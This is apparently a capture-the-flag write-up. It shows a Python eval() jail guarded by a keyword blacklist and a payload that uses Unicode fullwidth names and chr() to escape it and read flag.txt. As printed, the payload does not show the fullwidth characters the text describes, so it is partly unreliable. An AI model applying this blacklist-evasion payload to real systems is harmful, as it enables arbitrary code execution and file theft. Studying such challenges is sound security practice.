Profanity Check
Noobmaster
This one was hard, by taking a look at the code -
#/usr/bin/env python3
from unicodedata import normalize
import random
i = input(">>> ")
for n in range(10000):
if random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") in i:
print("Profanity detected. Exiting.")
exit(0)
i = normalize("NFC", i)
blacklist = ["__", "()", "{", "}", "[", "]", ";", ":", "!", "@", "#", "$", "%", "^", "&", "*", ",", "class", "mro", "sub", "glob"]
for n in blacklist:
if n in i:
print("Profanity detected. Exiting.")
exit(0)
eval(i)
So the vulnreablity here is the eval()
We can understand that if we input any characters in lowercase or uppercase it is removed and every special characters is removed.
Note that the blacklist does not allow () but it allows (“Anything here”) so if you put anything in brackets it is not blacklisted and allowed!
The blacklist is for normal letters but it can be bypassed using special full width letters aka unicode letters and if you input unicode letters in python it still works!
For example it does not allow print() but allows print().
So our input will be -
print(open(chr(102) + chr(108) + chr(97) + chr(103) + chr(46) + chr(116) + chr(120) + chr(116)).read(115))
now everything is in unicode except . ( ) and numbers, the .read() has 5 in the brackets so not blacklisted!
Now you might have this question, why are you using chr? And thats beacuse flag.txt needs to be in ascii else file not found error and we can’t simply write flag.txt beacuse of the blacklist so we are able to do it using chr(). Also this python code get run on the netcat docker beacuse of eval().
So this basically means print(open('flag.txt')).read(115)
After inputting print(open(chr(102) + chr(108) + chr(97) + chr(103) + chr(46) + chr(116) + chr(120) + chr(116)).read(115))
We get
Flag
======= idek{s0_much_f0r_1nclud1ng_r4nd0m_1n_4_python_3v4l_c4lcul4t0r}